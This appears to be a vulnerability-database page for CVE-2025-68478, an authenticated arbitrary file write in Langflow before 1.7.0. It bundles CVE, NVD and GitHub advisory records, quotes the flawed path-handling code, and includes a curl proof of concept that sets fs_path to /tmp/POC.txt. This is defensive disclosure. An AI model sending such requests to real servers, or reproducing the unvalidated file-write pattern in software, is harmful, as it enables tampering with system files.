CVE-2025-68478 (GCVE-0-2025-68478)
Vulnerability from cvelistv5 – Published: 2025-12-19 17:10 – Updated: 2025-12-19 17:59
VLAI?
Title
Langflow Vulnerable to External Control of File Name or Path
Summary
Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0, if an arbitrary path is specified in the request body's `fs_path`, the server serializes the Flow object into JSON and creates/overwrites a file at that path. There is no path restriction, normalization, or allowed directory enforcement, so absolute paths (e.g., /etc/poc.txt) are interpreted as is. Version 1.7.0 fixes the issue.
Severity ?
7.1 (High)
CWE
- CWE-73 - External Control of File Name or Path
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| langflow-ai | langflow |
Affected:
< 1.7.0
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-68478",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-12-19T17:23:19.216500Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-12-19T17:59:42.829Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "langflow",
"vendor": "langflow-ai",
"versions": [
{
"status": "affected",
"version": "\u003c 1.7.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0, if an arbitrary path is specified in the request body\u0027s `fs_path`, the server serializes the Flow object into JSON and creates/overwrites a file at that path. There is no path restriction, normalization, or allowed directory enforcement, so absolute paths (e.g., /etc/poc.txt) are interpreted as is. Version 1.7.0 fixes the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-73",
"description": "CWE-73: External Control of File Name or Path",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-12-19T17:10:14.107Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4"
}
],
"source": {
"advisory": "GHSA-f43r-cc68-gpx4",
"discovery": "UNKNOWN"
},
"title": "Langflow Vulnerable to External Control of File Name or Path"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-68478",
"datePublished": "2025-12-19T17:10:14.107Z",
"dateReserved": "2025-12-18T18:29:07.309Z",
"dateUpdated": "2025-12-19T17:59:42.829Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-68478\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-12-19T18:15:51.623\",\"lastModified\":\"2025-12-23T14:52:09.593\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0, if an arbitrary path is specified in the request body\u0027s `fs_path`, the server serializes the Flow object into JSON and creates/overwrites a file at that path. There is no path restriction, normalization, or allowed directory enforcement, so absolute paths (e.g., /etc/poc.txt) are interpreted as is. Version 1.7.0 fixes the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L\",\"baseScore\":7.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":2.8,\"impactScore\":4.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-73\"}]}],\"references\":[{\"url\":\"https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-68478\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-12-19T17:23:19.216500Z\"}}}], \"references\": [{\"url\": \"https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-12-19T17:23:21.407Z\"}}], \"cna\": {\"title\": \"Langflow Vulnerable to External Control of File Name or Path\", \"source\": {\"advisory\": \"GHSA-f43r-cc68-gpx4\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"langflow-ai\", \"product\": \"langflow\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.7.0\"}]}], \"references\": [{\"url\": \"https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4\", \"name\": \"https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0, if an arbitrary path is specified in the request body\u0027s `fs_path`, the server serializes the Flow object into JSON and creates/overwrites a file at that path. There is no path restriction, normalization, or allowed directory enforcement, so absolute paths (e.g., /etc/poc.txt) are interpreted as is. Version 1.7.0 fixes the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-73\", \"description\": \"CWE-73: External Control of File Name or Path\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-12-19T17:10:14.107Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-68478\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-12-19T17:59:42.829Z\", \"dateReserved\": \"2025-12-18T18:29:07.309Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-12-19T17:10:14.107Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2025-68478
Vulnerability from fkie_nvd - Published: 2025-12-19 18:15 - Updated: 2025-12-23 14:52
Severity ?
Summary
Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0, if an arbitrary path is specified in the request body's `fs_path`, the server serializes the Flow object into JSON and creates/overwrites a file at that path. There is no path restriction, normalization, or allowed directory enforcement, so absolute paths (e.g., /etc/poc.txt) are interpreted as is. Version 1.7.0 fixes the issue.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0, if an arbitrary path is specified in the request body\u0027s `fs_path`, the server serializes the Flow object into JSON and creates/overwrites a file at that path. There is no path restriction, normalization, or allowed directory enforcement, so absolute paths (e.g., /etc/poc.txt) are interpreted as is. Version 1.7.0 fixes the issue."
}
],
"id": "CVE-2025-68478",
"lastModified": "2025-12-23T14:52:09.593",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 4.2,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-12-19T18:15:51.623",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-73"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
GHSA-F43R-CC68-GPX4
Vulnerability from github – Published: 2025-12-19 22:53 – Updated: 2025-12-19 22:53
VLAI?
Summary
External Control of File Name or Path in Langflow
Details
Vulnerability Overview
If an arbitrary path is specified in the request body's fs_path, the server serializes the Flow object into JSON and creates/overwrites a file at that path. There is no path restriction, normalization, or allowed directory enforcement, so absolute paths (e.g., /etc/poc.txt) are interpreted as is.
Vulnerable Code
-
It receives the request body (flow), updates the DB, and then passes it to the file-writing sink.
https://github.com/langflow-ai/langflow/blob/ac6e2d2eabeee28085f2739d79f7ce4205ca082c/src/backend/base/langflow/api/v1/flows.py#L154-L168
```python @router.post("/", response_model=FlowRead, status_code=201) async def create_flow( *, session: DbSession, flow: FlowCreate, current_user: CurrentActiveUser, ): try: db_flow = await _new_flow(session=session, flow=flow, user_id=current_user.id) await session.commit() await session.refresh(db_flow)
await _save_flow_to_fs(db_flow) except Exception as e:```
-
Applies authentication dependency (requires API Key/JWT) when accessing the endpoint.
https://github.com/langflow-ai/langflow/blob/ac6e2d2eabeee28085f2739d79f7ce4205ca082c/src/backend/base/langflow/api/utils/core.py#L36-L38
python CurrentActiveUser = Annotated[User, Depends(get_current_active_user)] CurrentActiveMCPUser = Annotated[User, Depends(get_current_active_user_mcp)] DbSession = Annotated[AsyncSession, Depends(get_session)] -
The client can directly specify the save path, including
fs_path.https://github.com/langflow-ai/langflow/blob/ac6e2d2eabeee28085f2739d79f7ce4205ca082c/src/backend/base/langflow/api/v1/flows.py#L66-L70
```python ): try: await _verify_fs_path(flow.fs_path)
"""Create a new flow."""```
-
It attempts to create the file (or the file, in the case of a path without a parent) directly without path validation.
https://github.com/langflow-ai/langflow/blob/ac6e2d2eabeee28085f2739d79f7ce4205ca082c/src/backend/base/langflow/api/v1/flows.py#L45-L49
python async def _verify_fs_path(path: str | None) -> None: if path: path_ = Path(path) if not await path_.exists(): await path_.touch() -
Serializes the Flow object to JSON and writes it to the specified path in "w" mode (overwriting).
https://github.com/langflow-ai/langflow/blob/ac6e2d2eabeee28085f2739d79f7ce4205ca082c/src/backend/base/langflow/api/v1/flows.py#L52-L58
python async def _save_flow_to_fs(flow: Flow) -> None: if flow.fs_path: async with async_open(flow.fs_path, "w") as f: try: await f.write(flow.model_dump_json()) except OSError: await logger.aexception("Failed to write flow %s to path %s", flow.name, flow.fs_path)
PoC Description
When an authenticated user passes an arbitrary path in fs_path, the Flow JSON is written to that path. Since /tmp is usually writable, it is easy to reproduce. In a production environment, writing to system-protected directories may fail depending on permissions.
PoC
-
Before Exploit
-
After Exploit
bash curl -sS -X POST "http://localhost:7860/api/v1/flows/" \ -H "Content-Type: application/json" \ -H "x-api-key: sk-8Kyzf9IQ-UEJ_OtSTaJq4eniMT9_JKgZ7__q8PNkoxc" \ -d '{"name":"poc-etc","data":{"nodes":[],"edges":[]},"fs_path":"/tmp/POC.txt"}'
Impact
- Authenticated Arbitrary File Write (within server permission scope): Risk of corrupting configuration/log/task files, disrupting application behavior, and tampering with files read by other components.
- Both absolute and relative paths are allowed, enabling base directory traversal. The risk of overwriting system files increases in environments with root privileges or weak mount/permission settings.
- The file content is limited to Flow JSON, but the impact is severe if the target file is parsed by a JSON parser or is subject to subsequent processing.
- In production environments, it is essential to enforce a save root, normalize paths, block symlink traversal, and minimize permissions.
Severity ?
7.1 (High)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "langflow"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.7.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-68478"
],
"database_specific": {
"cwe_ids": [
"CWE-73"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-19T22:53:13Z",
"nvd_published_at": "2025-12-19T18:15:51Z",
"severity": "HIGH"
},
"details": "**Vulnerability Overview**\n\nIf an arbitrary path is specified in the request body\u0027s `fs_path`, the server serializes the Flow object into JSON and creates/overwrites a file at that path. There is no path restriction, normalization, or allowed directory enforcement, so absolute paths (e.g., /etc/poc.txt) are interpreted as is.\n\n**Vulnerable Code**\n\n1. It receives the request body (flow), updates the DB, and then passes it to the file-writing sink.\n \n https://github.com/langflow-ai/langflow/blob/ac6e2d2eabeee28085f2739d79f7ce4205ca082c/src/backend/base/langflow/api/v1/flows.py#L154-L168\n \n ```python\n @router.post(\"/\", response_model=FlowRead, status_code=201)\n async def create_flow(\n *,\n session: DbSession,\n flow: FlowCreate,\n current_user: CurrentActiveUser,\n ):\n try:\n db_flow = await _new_flow(session=session, flow=flow, user_id=current_user.id)\n await session.commit()\n await session.refresh(db_flow)\n \n await _save_flow_to_fs(db_flow)\n \n except Exception as e:\n ```\n \n2. Applies authentication dependency (requires API Key/JWT) when accessing the endpoint.\n \n https://github.com/langflow-ai/langflow/blob/ac6e2d2eabeee28085f2739d79f7ce4205ca082c/src/backend/base/langflow/api/utils/core.py#L36-L38\n \n ```python\n CurrentActiveUser = Annotated[User, Depends(get_current_active_user)]\n CurrentActiveMCPUser = Annotated[User, Depends(get_current_active_user_mcp)]\n DbSession = Annotated[AsyncSession, Depends(get_session)]\n ```\n \n3. The client can directly specify the save path, including `fs_path`.\n \n https://github.com/langflow-ai/langflow/blob/ac6e2d2eabeee28085f2739d79f7ce4205ca082c/src/backend/base/langflow/api/v1/flows.py#L66-L70\n \n ```python\n ):\n try:\n await _verify_fs_path(flow.fs_path)\n \n \"\"\"Create a new flow.\"\"\"\n ```\n \n4. It attempts to create the file (or *the* file, in the case of a path without a parent) directly without path validation.\n \n https://github.com/langflow-ai/langflow/blob/ac6e2d2eabeee28085f2739d79f7ce4205ca082c/src/backend/base/langflow/api/v1/flows.py#L45-L49\n \n ```python\n async def _verify_fs_path(path: str | None) -\u003e None:\n if path:\n path_ = Path(path)\n if not await path_.exists():\n await path_.touch()\n ```\n \n5. Serializes the Flow object to JSON and writes it to the specified path in \"w\" mode (overwriting).\n \n https://github.com/langflow-ai/langflow/blob/ac6e2d2eabeee28085f2739d79f7ce4205ca082c/src/backend/base/langflow/api/v1/flows.py#L52-L58\n \n ```python\n async def _save_flow_to_fs(flow: Flow) -\u003e None:\n if flow.fs_path:\n async with async_open(flow.fs_path, \"w\") as f:\n try:\n await f.write(flow.model_dump_json())\n except OSError:\n await logger.aexception(\"Failed to write flow %s to path %s\", flow.name, flow.fs_path)\n ```\n \n\n**PoC Description**\n\nWhen an authenticated user passes an arbitrary path in `fs_path`, the Flow JSON is written to that path. Since `/tmp` is usually writable, it is easy to reproduce. In a production environment, writing to system-protected directories may fail depending on permissions.\n\n**PoC**\n\n- **Before Exploit**\n \n\n \u003cimg width=\"1918\" height=\"658\" alt=\"image\" src=\"https://github.com/user-attachments/assets/fe3c2306-091d-4cb0-b4dc-c7fb63c03d8d\" /\u003e\n \n- **After Exploit**\n \n ```bash\n curl -sS -X POST \"http://localhost:7860/api/v1/flows/\" \\\n -H \"Content-Type: application/json\" \\\n -H \"x-api-key: sk-8Kyzf9IQ-UEJ_OtSTaJq4eniMT9_JKgZ7__q8PNkoxc\" \\\n -d \u0027{\"name\":\"poc-etc\",\"data\":{\"nodes\":[],\"edges\":[]},\"fs_path\":\"/tmp/POC.txt\"}\u0027\n ```\n \n \u003cimg width=\"1918\" height=\"742\" alt=\"image\" src=\"https://github.com/user-attachments/assets/cc0b0c96-1c2d-4d56-b558-5ba97e0ec174\" /\u003e\n \n\n### Impact\n\n- **Authenticated Arbitrary File Write (within server permission scope):** Risk of corrupting configuration/log/task files, disrupting application behavior, and tampering with files read by other components.\n- **Both absolute and relative paths are allowed, enabling base directory traversal.** The risk of overwriting system files increases in environments with root privileges or weak mount/permission settings.\n- **The file content is limited to Flow JSON,** but the impact is severe if the target file is parsed by a JSON parser or is subject to subsequent processing.\n- **In production environments, it is essential to enforce a save root, normalize paths, block symlink traversal, and minimize permissions.**",
"id": "GHSA-f43r-cc68-gpx4",
"modified": "2025-12-19T22:53:13Z",
"published": "2025-12-19T22:53:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68478"
},
{
"type": "PACKAGE",
"url": "https://github.com/langflow-ai/langflow"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "External Control of File Name or Path in Langflow"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…